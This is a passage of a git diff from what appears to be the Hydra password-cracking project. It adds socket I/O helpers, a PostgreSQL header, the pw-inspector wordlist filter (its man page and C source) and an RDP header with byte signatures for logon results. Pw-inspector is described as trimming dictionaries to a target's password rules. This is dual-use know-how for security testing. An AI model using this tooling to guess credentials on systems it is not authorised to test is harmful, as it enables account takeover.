fdwrite, fd_set * fdex, long sec, long usec) { + int ret_val; + struct timeval stv; + fd_set *fdr2, *fdw2, *fde2; + + do { + fdr2 = fdread; + fdw2 = fdwrite; + fde2 = fdex; + stv.tv_sec = sec; + stv.tv_usec = usec; + ret_val = select(fd, fdr2, fdw2, fde2, &stv); + /* XXX select() sometimes returns errno=EINTR (signal found) */ + } while (ret_val == -1 && errno == EINTR); + + return ret_val; +} + +/*reads in a non-blocking way*/ +ssize_t read_safe(int fd, void *buffer, size_t len) { + int r = 0; + int total = 0; + int toread = len; + fd_set fr; + struct timeval tv; + int ret = 0; + + fcntl(fd, F_SETFL, O_NONBLOCK); + do { + FD_ZERO(&fr); + FD_SET(fd, &fr); + tv.tv_sec = 0; + tv.tv_usec = 250000; + ret = select(fd + 1, &fr, 0, 0, &tv); + /* XXX select() sometimes return errno=EINTR (signal found) */ + } while (ret == -1 && errno == EINTR); + + if (ret < 0) { + if (debug) { + perror("select"); + printf("df:%d\n", fd); + } + return -1; + } + + if (ret > 0) { + while ((r = read(fd, (char*) ((char*)buffer + total), toread))) { + if (r == -1) { + if (errno == EAGAIN) + break; + return -1; + } + total += r; + toread -= r; + if (total == len) + return len; + if (r == 0) + return 0; + } + } + + return total; +} diff --git a/postgres_ext.h b/postgres_ext.h new file mode 100644 index 0000000..20affdd --- /dev/null +++ b/postgres_ext.h @@ -0,0 +1,69 @@ + +/*------------------------------------------------------------------------- + * + * postgres_ext.h + * + * This file contains declarations of things that are visible everywhere + * in PostgreSQL *and* are visible to clients of frontend interface libraries. + * For example, the Oid type is part of the API of libpq and other libraries. + * + * Declarations which are specific to a particular interface should + * go in the header file for that interface (such as libpq-fe.h). This + * file is only for fundamental Postgres declarations. + * + * User-written C functions don't count as "external to Postgres." + * Those function much as local modifications to the backend itself, and + * use header files that are otherwise internal to Postgres to interface + * with the backend. + * + * $Id: postgres_ext.h,v 1.13 2003/08/27 00:33:34 petere Exp $ + * + *------------------------------------------------------------------------- + */ + +#ifndef POSTGRES_EXT_H +#define POSTGRES_EXT_H + +/* + * Object ID is a fundamental type in Postgres. + */ +typedef unsigned int Oid; + +#ifdef __cplusplus +#define InvalidOid (Oid(0)) +#else +#define InvalidOid ((Oid) 0) +#endif + +#define OID_MAX UINT_MAX + +/* you will need to include to use the above #define */ + + +/* + * NAMEDATALEN is the max length for system identifiers (e.g. table names, + * attribute names, function names, etc). It must be a multiple of + * sizeof(int) (typically 4). + * + * NOTE that databases with different NAMEDATALEN's cannot interoperate! + */ +#define NAMEDATALEN 64 + + +/* + * Identifiers of error message fields. Kept here to keep common + * between frontend and backend, and also to export them to libpq + * applications. + */ +#define PG_DIAG_SEVERITY 'S' +#define PG_DIAG_SQLSTATE 'C' +#define PG_DIAG_MESSAGE_PRIMARY 'M' +#define PG_DIAG_MESSAGE_DETAIL 'D' +#define PG_DIAG_MESSAGE_HINT 'H' +#define PG_DIAG_STATEMENT_POSITION 'P' +#define PG_DIAG_CONTEXT 'W' +#define PG_DIAG_SOURCE_FILE 'F' +#define PG_DIAG_SOURCE_LINE 'L' +#define PG_DIAG_SOURCE_FUNCTION 'R' + +#endif diff --git a/pw-inspector-logo.rc b/pw-inspector-logo.rc new file mode 100644 index 0000000..e6fbcfe --- /dev/null +++ b/pw-inspector-logo.rc @@ -0,0 +1 @@ +1 ICON "pw-inspector.ico" diff --git a/pw-inspector.1 b/pw-inspector.1 new file mode 100644 index 0000000..90bff65 --- /dev/null +++ b/pw-inspector.1 @@ -0,0 +1,57 @@ +.TH "PW-INSPECTOR" "1" "24/05/2012" +.SH NAME +pw-inspector \- A tool to reduce the password list +.SH SYNOPSIS +.B pw-inspector +[\-i FILE] [\-o FILE] [\-m MINLEN] [\-M MAXLEN] [\-c MINSETS] \-l \-u \-n \-p \-s +.br +.SH DESCRIPTION +PW-Inspector reads passwords in and prints those which meet the requirements. +The return code is the number of valid passwords found, 0 if none was found. +Use for security: check passwords, if 0 is returned, reject password choice. +Use for hacking: trim your dictionary file to the pw requirements of the target. +Usage only allowed for legal purposes. +.SH OPTIONS +.TP +.B \-i FILE +file to read passwords from (default: stdin) +.TP +.B \-o FILE +file to write valid passwords to (default: stdout) +.TP +.B \-m MINLEN +minimum length of a valid password +.TP +.B \-M MAXLEN +maximum length of a valid password +.TP +.B \-c MINSETS +the minimum number of sets required (default: all given) +.TP +.B \-h, \-\-help +Show summary of options. +.SH SETS +.TP +.B \-l +lowcase characters (a,b,c,d, etc.) +.TP +.B \-u +upcase characters (A,B,C,D, etc.) +.TP +.B \-n +numbers (1,2,3,4, etc.) +.TP +.B \-p +printable characters (which are not \-l/\-n/\-p, e.g. $,!,/,(,*, etc.) +.TP +.B \ -s +special characters \- all others not withint the sets above +.SH SEE ALSO +.BR hydra (1), +.BR xhydra (1). +.br +.SH AUTHOR +hydra was written by van Hauser / THC and co-maintained by David Maciejak . +.PP +This manual page was written by Daniel Echeverry , +for the Debian project (and may be used by others). diff --git a/pw-inspector.c b/pw-inspector.c new file mode 100644 index 0000000..003fd00 --- /dev/null +++ b/pw-inspector.c @@ -0,0 +1,164 @@ +#include +#include +#include +#include +#include + +#define PROGRAM "PW-Inspector" +#define VERSION "v0.2" +#define EMAIL "vh@thc.org" +#define WEB "http://www.thc.org" + +#define MAXLENGTH 256 + +char *prg; + +void help() { + printf("%s %s (c) 2005 by van Hauser / THC %s [%s]\n\n", PROGRAM, VERSION, EMAIL, WEB); + printf("Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s\n\n", prg); + printf("Options:\n"); + printf(" -i FILE file to read passwords from (default: stdin)\n"); + printf(" -o FILE file to write valid passwords to (default: stdout)\n"); + printf(" -m MINLEN minimum length of a valid password\n"); + printf(" -M MAXLEN maximum length of a valid password\n"); + printf(" -c MINSETS the minimum number of sets required (default: all given)\n"); + printf("Sets:\n"); + printf(" -l lowcase characters (a,b,c,d, etc.)\n"); + printf(" -u upcase characters (A,B,C,D, etc.)\n"); + printf(" -n numbers (1,2,3,4, etc.)\n"); + printf(" -p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)\n"); + printf(" -s special characters - all others not withint the sets above\n"); + printf("\n%s reads passwords in and prints those which meet the requirements.\n", PROGRAM); + printf("The return code is the number of valid passwords found, 0 if none was found.\n"); + printf("Use for security: check passwords, if 0 is returned, reject password choice.\n"); + printf("Use for hacking: trim your dictionary file to the pw requirements of the target.\n"); + printf("Usage only allowed for legal purposes.\n"); + exit(-1); +} + +int main(int argc, char *argv[]) { + int i, j, k; + int sets = 0, countsets = 0, minlen = 0, maxlen = MAXLENGTH, count = 0; + int set_low = 0, set_up = 0, set_no = 0, set_print = 0, set_other = 0; + FILE *in = stdin, *out = stdout; + char buf[MAXLENGTH + 1]; + + prg = argv[0]; + if (argc < 2) + help(); + + while ((i = getopt(argc, argv, "i:o:m:M:c:lunps")) >= 0) { + switch (i) { + case 'i': + if ((in = fopen(optarg, "r")) == NULL) { + fprintf(stderr, "Error: unable to open input file %s\n", optarg); + exit(-1); + } + break; + case 'o': + if ((out = fopen(optarg, "w")) == NULL) { + fprintf(stderr, "Error: unable to open output file %s\n", optarg); + exit(-1); + } + break; + case 'm': + minlen = atoi(optarg); + break; + case 'M': + maxlen = atoi(optarg); + break; + case 'c': + countsets = atoi(optarg); + break; + case 'l': + if (set_low == 0) { + set_low = 1; + sets++; + } + break; + case 'u': + if (set_up == 0) { + set_up = 1; + sets++; + } + break; + case 'n': + if (set_no == 0) { + set_no = 1; + sets++; + } + break; + case 'p': + if (set_print == 0) { + set_print = 1; + sets++; + } + break; + case 's': + if (set_other == 0) { + set_other = 1; + sets++; + } + break; + default: + help(); + } + } + if (minlen > maxlen) { + fprintf(stderr, "Error: -m MINLEN is greater than -M MAXLEN\n"); + exit(-1); + } + if (countsets > sets) { + fprintf(stderr, "Error: -c MINSETS is larger than the sets defined\n"); + exit(-1); + } + if (countsets == 0) + countsets = sets; + + while (fgets(buf, sizeof(buf), in) != NULL) { + i = -1; + if (buf[0] == 0) + continue; + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (strlen(buf) >= minlen && strlen(buf) <= maxlen) { + i = 0; + if (countsets > 0) { + if (set_low) + if (strpbrk(buf, "abcdefghijklmnopqrstuvwxyz") != NULL) + i++; + if (set_up) + if (strpbrk(buf, "ABCDEFGHIJKLMNOPQRSTUVWXYZ") != NULL) + i++; + if (set_no) + if (strpbrk(buf, "0123456789") != NULL) + i++; + if (set_print) { + j = 0; + for (k = 0; k < strlen(buf); k++) + if (isprint((int) buf[k]) != 0 && isalnum((int) buf[k]) == 0) + j = 1; + if (j) + i++; + } + if (set_other) { + j = 0; + for (k = 0; k < strlen(buf); k++) + if (isprint((int) buf[k]) == 0 && isalnum((int) buf[k]) == 0) + j = 1; + if (j) + i++; + } + } + if (i >= countsets) { + fprintf(out, "%s\n", buf); + count++; + } + } + /* fprintf(stderr, "[DEBUG] i: %d minlen: %d maxlen: %d len: %d\n", i, minlen, maxlen, strlen(buf)); */ + } + fclose(in); + fclose(out); + + return count; +} diff --git a/pw-inspector.ico b/pw-inspector.ico new file mode 100644 index 0000000000000000000000000000000000000000..d8f62740091df8b337c71120c012a01bc2ab6407 GIT binary patch literal 38078 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 N2>e$N_?HcL@gKM+_>BMn literal 0 HcmV?d00001 diff --git a/rdp.h b/rdp.h new file mode 100644 index 0000000..c4188df --- /dev/null +++ b/rdp.h @@ -0,0 +1,631 @@ +/* + david: this file is based on header files from rdesktop project + + rdesktop: A Remote Desktop Protocol client. + Master include file + Copyright (C) Matthew Chapman 1999-2008 + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +*/ + +#include "hydra-mod.h" + +#include +#include +#include +#ifdef _WIN32 +#define WINVER 0x0400 +#include +#include +#include +#define DIR int +#else +#include +#include +#ifdef HAVE_SYS_SELECT_H +#include +#else +#include +#include +#endif +#endif +#include /* PATH_MAX */ +#ifdef HAVE_SYSEXITS_H +#include +#endif + +#include /* stat */ +#include /* gettimeofday */ +#include /* times */ + +//fixme + +/* The system could not log you on. Make sure your User name and domain are correct [FAILED] */ +#define LOGON_MESSAGE_FAILED_XP "\x00\x00\x01\x06\x02\x06\x04\x09\x05\x05\x04\x06\x06\x05\x02\x04\x07\x06" +#define LOGON_MESSAGE_FAILED_2K3 "\x00\x00\x01\x08\x02\x07\x03\x07\x04\x07\x05\x05\x01\x05\x04\x07\x03\x05" +#define LOGON_MESSAGE_FAILED_2K8 "not needed" + +#define LOGON_MESSAGE_2K "\x00\x00\x01\x06\x02\x07\x04\x0a\x05\x08\x06\x0a\x01\x05\x07\x0a\x08\x0b\x05\x03\x09\x07\x01\x07\x0a\x07\x0b\x09\xff\x00\x1c" + +/* The local policy of this system does not permit you to logon interactively. [SUCCESS] */ +#define LOGON_MESSAGE_NO_INTERACTIVE_XP "\x00\x00\x01\x06\x02\x06\x04\x09\x05\x02\x06\x06\x07\x05\x04\x06\x08\x05" +#define LOGON_MESSAGE_NO_INTERACTIVE_2K3 "??" + +/* Unable to log you on because your account has been locked out [FAILED] */ +#define LOGON_MESSAGE_LOCKED_XP "\x00\x00\x01\x07\x02\x06\x03\x06\x04\x06\x05\x02\x07\x09\x08\x04\x04\x09" +#define LOGON_MESSAGE_LOCKED_2K3 "??" + +/* Your account has been disabled. Please see your system administrator. [ERROR] */ +/* Your account has expired. Please see your system administrator. [ERROR] */ +#define LOGON_MESSAGE_DISABLED_XP "\x00\x00\x01\x06\x02\x06\x03\x06\x05\x07\x06\x06\x06\x05\x01\x05\x02\x06" +#define LOGON_MESSAGE_DISABLED_2K3 "??" + +/* Your password has expired and must be changed. [SUCCESS] */ +#define LOGON_MESSAGE_EXPIRED_XP "\x00\x00\x01\x06\x02\x06\x03\x06\x05\x07\x06\x06\x07\x06\x07\x05\x08\x05" +#define LOGON_MESSAGE_EXPIRED_2K3 "??" + +/* You are required to change your password at first logon. [SUCCESS] */ +#define LOGON_MESSAGE_MUST_CHANGE_XP "\x00\x00\x01\x06\x02\x06\x04\x09\x05\x06\x06\x04\x05\x09\x06\x04\x07\x06" +#define LOGON_MESSAGE_MUST_CHANGE_2K3 "??" + +/* The terminal server has exceeded the maximum number of allowed connections. [SUCCESS] */ +#define LOGON_MESSAGE_MSTS_MAX_2K3 "\x00\x00\x01\x06\x02\x07\x01\x07\x05\x07\x24\x0a\x25\x0a\x0b\x07\x0b\x06\x26" + + +#define DEBUG(args) { if (debug) {hydra_report(stderr, "[DEBUG] "); printf args; }} +#define DEBUG_RDP5(args){ if (debug) {hydra_report(stderr, "[DEBUG] RDP5 "); printf args; }} + +#define STRNCPY(dst,src,n) { strncpy(dst,src,n-1); dst[n-1] = 0; } + +#ifndef MIN +#define MIN(x,y) (((x) < (y)) ? (x) : (y)) +#endif + +#ifndef MAX +#define MAX(x,y) (((x) > (y)) ? (x) : (y)) +#endif + +/* timeval macros */ +#ifndef timerisset +#define timerisset(tvp)\ + ((tvp)->tv_sec || (tvp)->tv_usec) +#endif +#ifndef timercmp +#define timercmp(tvp, uvp, cmp)\ + ((tvp)->tv_sec cmp (uvp)->tv_sec ||\ + (tvp)->tv_sec == (uvp)->tv_sec &&\ + (tvp)->tv_usec cmp (uvp)->tv_usec) +#endif +#ifndef timerclear +#define timerclear(tvp)\ + ((tvp)->tv_sec = (tvp)->tv_usec = 0) +#endif + +/* If configure does not define the endianess, try + to find it out */ +#if !defined(L_ENDIAN) && !defined(B_ENDIAN) +#if __BYTE_ORDER == __LITTLE_ENDIAN +#define L_ENDIAN +#elif __BYTE_ORDER == __BIG_ENDIAN +#define B_ENDIAN +#else +#error Unknown endianness. Edit rdp.h. +#endif +#endif /* B_ENDIAN, L_ENDIAN from configure */ + +/* No need for alignment on x86 and amd64 */ +#if !defined(NEED_ALIGN) +#if !(defined(__x86__) || defined(__x86_64__) || \ + defined(__AMD64__) || defined(_M_IX86) || \ + defined(__i386__)) +#define NEED_ALIGN +#endif +#endif + +/* Parser state */ +typedef struct stream +{ + unsigned char *p; + unsigned char *end; + unsigned char *data; + unsigned int size; + + /* Offsets of various headers */ + unsigned char *iso_hdr; + unsigned char *mcs_hdr; + unsigned char *sec_hdr; + unsigned char *rdp_hdr; + unsigned char *channel_hdr; + +} + *STREAM; + +#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } +#define s_pop_layer(s,h) (s)->p = (s)->h; +#define s_mark_end(s) (s)->end = (s)->p; +#define s_check(s) ((s)->p <= (s)->end) +#define s_check_rem(s,n) ((s)->p + n <= (s)->end) +#define s_check_end(s) ((s)->p == (s)->end) + +#if defined(L_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_le(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_le(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_le(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_le(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } + +#else +#define in_uint16_le(s,v) { v = *((s)->p++); v += *((s)->p++) << 8; } +#define in_uint32_le(s,v) { in_uint16_le(s,v) \ + v += *((s)->p++) << 16; v += *((s)->p++) << 24; } +#define out_uint16_le(s,v) { *((s)->p++) = (v) & 0xff; *((s)->p++) = ((v) >> 8) & 0xff; } +#define out_uint32_le(s,v) { out_uint16_le(s, (v) & 0xffff); out_uint16_le(s, ((v) >> 16) & 0xffff); } +#endif + +#if defined(B_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_be(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_be(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_be(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_be(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } + +#define B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_be(s,v) +#define in_uint32(s,v) in_uint32_be(s,v) +#define out_uint16(s,v) out_uint16_be(s,v) +#define out_uint32(s,v) out_uint32_be(s,v) + +#else +#define in_uint16_be(s,v) { v = *((s)->p++); next_be(s,v); } +#define in_uint32_be(s,v) { in_uint16_be(s,v); next_be(s,v); next_be(s,v); } +#define out_uint16_be(s,v) { *((s)->p++) = ((v) >> 8) & 0xff; *((s)->p++) = (v) & 0xff; } +#define out_uint32_be(s,v) { out_uint16_be(s, ((v) >> 16) & 0xffff); out_uint16_be(s, (v) & 0xffff); } +#endif + +#ifndef B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_le(s,v) +#define in_uint32(s,v) in_uint32_le(s,v) +#define out_uint16(s,v) out_uint16_le(s,v) +#define out_uint32(s,v) out_uint32_le(s,v) +#endif + +#define in_uint8(s,v) v = *((s)->p++); +#define in_uint8p(s,v,n) { v = (s)->p; (s)->p += n; } +#define in_uint8a(s,v,n) { memcpy(v,(s)->p,n); (s)->p += n; } +#define in_uint8s(s,n) (s)->p += n; +#define out_uint8(s,v) *((s)->p++) = v; +#define out_uint8p(s,v,n) { memcpy((s)->p,v,n); (s)->p += n; } +#define out_uint8a(s,v,n) out_uint8p(s,v,n); +#define out_uint8s(s,n) { memset((s)->p,0,n); (s)->p += n; } + +#define next_be(s,v) v = ((v) << 8) + *((s)->p++); + +typedef unsigned char uint8; +typedef signed char sint8; +typedef unsigned short uint16; +typedef signed short sint16; +typedef unsigned int uint32; +typedef signed int sint32; + +typedef struct _BOUNDS +{ + sint16 left; + sint16 top; + sint16 right; + sint16 bottom; + +} +BOUNDS; + +/* PSTCACHE */ +typedef uint8 HASH_KEY[8]; + +#ifndef PATH_MAX +#define PATH_MAX 256 +#endif + +#define RDP_ORDER_STANDARD 0x01 +#define RDP_ORDER_SECONDARY 0x02 +#define RDP_ORDER_BOUNDS 0x04 +#define RDP_ORDER_CHANGE 0x08 +#define RDP_ORDER_DELTA 0x10 +#define RDP_ORDER_LASTBOUNDS 0x20 +#define RDP_ORDER_SMALL 0x40 +#define RDP_ORDER_TINY 0x80 + +enum RDP_ORDER_TYPE +{ + RDP_ORDER_DESTBLT = 0, + RDP_ORDER_PATBLT = 1, + RDP_ORDER_SCREENBLT = 2, + RDP_ORDER_LINE = 9, + RDP_ORDER_RECT = 10, + RDP_ORDER_DESKSAVE = 11, + RDP_ORDER_MEMBLT = 13, + RDP_ORDER_TRIBLT = 14, + RDP_ORDER_POLYGON = 20, + RDP_ORDER_POLYGON2 = 21, + RDP_ORDER_POLYLINE = 22, + RDP_ORDER_ELLIPSE = 25, + RDP_ORDER_ELLIPSE2 = 26, + RDP_ORDER_TEXT2 = 27 +}; + +enum RDP_SECONDARY_ORDER_TYPE +{ + RDP_ORDER_RAW_BMPCACHE = 0, + RDP_ORDER_COLCACHE = 1, + RDP_ORDER_BMPCACHE = 2, + RDP_ORDER_FONTCACHE = 3, + RDP_ORDER_RAW_BMPCACHE2 = 4, + RDP_ORDER_BMPCACHE2 = 5, + RDP_ORDER_BRUSHCACHE = 7 +}; + +typedef struct _RECT_ORDER +{ + sint16 x; + sint16 y; + sint16 cx; + sint16 cy; + uint32 colour; + +} +RECT_ORDER; + +typedef struct _DESKSAVE_ORDER +{ + uint32 offset; + sint16 left; + sint16 top; + sint16 right; + sint16 bottom; + uint8 action; + +} +DESKSAVE_ORDER; + +typedef struct _MEMBLT_ORDER +{ + uint8 colour_table; + uint8 cache_id; + sint16 x; + sint16 y; + sint16 cx; + sint16 cy; + uint8 opcode; + sint16 srcx; + sint16 srcy; + uint16 cache_idx; + +} +MEMBLT_ORDER; + +#define MAX_DATA 256 +#define MAX_TEXT 256 + +typedef struct _TEXT2_ORDER +{ + uint8 font; + uint8 flags; + uint8 opcode; + uint8 mixmode; + uint32 bgcolour; + uint32 fgcolour; + sint16 clipleft; + sint16 cliptop; + sint16 clipright; + sint16 clipbottom; + sint16 boxleft; + sint16 boxtop; + sint16 boxright; + sint16 boxbottom; + sint16 x; + sint16 y; + uint8 length; + uint8 text[MAX_TEXT]; + +} +TEXT2_ORDER; + +typedef struct _RDP_ORDER_STATE +{ + uint8 order_type; + BOUNDS bounds; + + RECT_ORDER rect; + DESKSAVE_ORDER desksave; + MEMBLT_ORDER memblt; + TEXT2_ORDER text2; +} +RDP_ORDER_STATE; + +#define WINDOWS_CODEPAGE "UTF-16LE" + +/* ISO PDU codes */ +enum ISO_PDU_CODE +{ + ISO_PDU_CR = 0xE0, /* Connection Request */ + ISO_PDU_CC = 0xD0, /* Connection Confirm */ + ISO_PDU_DR = 0x80, /* Disconnect Request */ + ISO_PDU_DT = 0xF0, /* Data */ + ISO_PDU_ER = 0x70 /* Error */ +}; + +/* MCS PDU codes */ +enum MCS_PDU_TYPE +{ + MCS_EDRQ = 1, /* Erect Domain Request */ + MCS_DPUM = 8, /* Disconnect Provider Ultimatum */ + MCS_AURQ = 10, /* Attach User Request */ + MCS_AUCF = 11, /* Attach User Confirm */ + MCS_CJRQ = 14, /* Channel Join Request */ + MCS_CJCF = 15, /* Channel Join Confirm */ + MCS_SDRQ = 25, /* Send Data Request */ + MCS_SDIN = 26 /* Send Data Indication */ +}; + +#define MCS_CONNECT_INITIAL 0x7f65 +#define MCS_CONNECT_RESPONSE 0x7f66 + +#define BER_TAG_BOOLEAN 1 +#define BER_TAG_INTEGER 2 +#define BER_TAG_OCTET_STRING 4 +#define BER_TAG_RESULT 10 +#define MCS_TAG_DOMAIN_PARAMS 0x30 + +#define MCS_GLOBAL_CHANNEL 1003 +#define MCS_USERCHANNEL_BASE 1001 + +/* RDP secure transport constants */ +#define SEC_RANDOM_SIZE 32 +#define SEC_MODULUS_SIZE 64 +#define SEC_MAX_MODULUS_SIZE 256 +#define SEC_PADDING_SIZE 8 +#define SEC_EXPONENT_SIZE 4 + +#define SEC_CLIENT_RANDOM 0x0001 +#define SEC_ENCRYPT 0x0008 +#define SEC_LOGON_INFO 0x0040 +#define SEC_LICENCE_NEG 0x0080 +#define SEC_REDIRECT_ENCRYPT 0x0C00 + +#define SEC_TAG_SRV_INFO 0x0c01 +#define SEC_TAG_SRV_CRYPT 0x0c02 +#define SEC_TAG_SRV_CHANNELS 0x0c03 + +#define SEC_TAG_CLI_INFO 0xc001 +#define SEC_TAG_CLI_CRYPT 0xc002 +#define SEC_TAG_CLI_CHANNELS 0xc003 +#define SEC_TAG_CLI_4 0xc004 + +#define SEC_TAG_PUBKEY 0x0006 +#define SEC_TAG_KEYSIG 0x0008 + +#define SEC_RSA_MAGIC 0x31415352 /* RSA1 */ + +/* RDP PDU codes */ +enum RDP_PDU_TYPE +{ + RDP_PDU_DEMAND_ACTIVE = 1, + RDP_PDU_CONFIRM_ACTIVE = 3, + RDP_PDU_REDIRECT = 4, /* MS Server 2003 Session Redirect */ + RDP_PDU_DEACTIVATE = 6, + RDP_PDU_DATA = 7 +}; + +enum RDP_DATA_PDU_TYPE +{ + RDP_DATA_PDU_UPDATE = 2, + RDP_DATA_PDU_CONTROL = 20, + RDP_DATA_PDU_POINTER = 27, + RDP_DATA_PDU_INPUT = 28, + RDP_DATA_PDU_SYNCHRONISE = 31, + RDP_DATA_PDU_BELL = 34, + RDP_DATA_PDU_CLIENT_WINDOW_STATUS = 35, + RDP_DATA_PDU_LOGON = 38, /* PDUTYPE2_SAVE_SESSION_INFO */ + RDP_DATA_PDU_FONT2 = 39, + RDP_DATA_PDU_KEYBOARD_INDICATORS = 41, + RDP_DATA_PDU_DISCONNECT = 47 +}; + +enum RDP_SAVE_SESSION_PDU_TYPE +{ + INFOTYPE_LOGON = 0, + INFOTYPE_LOGON_LONG = 1, + INFOTYPE_LOGON_PLAINNOTIFY = 2, + INFOTYPE_LOGON_EXTENDED_INF = 3 +}; + +enum RDP_LOGON_INFO_EXTENDED_TYPE +{ + LOGON_EX_AUTORECONNECTCOOKIE = 1, + LOGON_EX_LOGONERRORS = 2 +}; + +enum RDP_CONTROL_PDU_TYPE +{ + 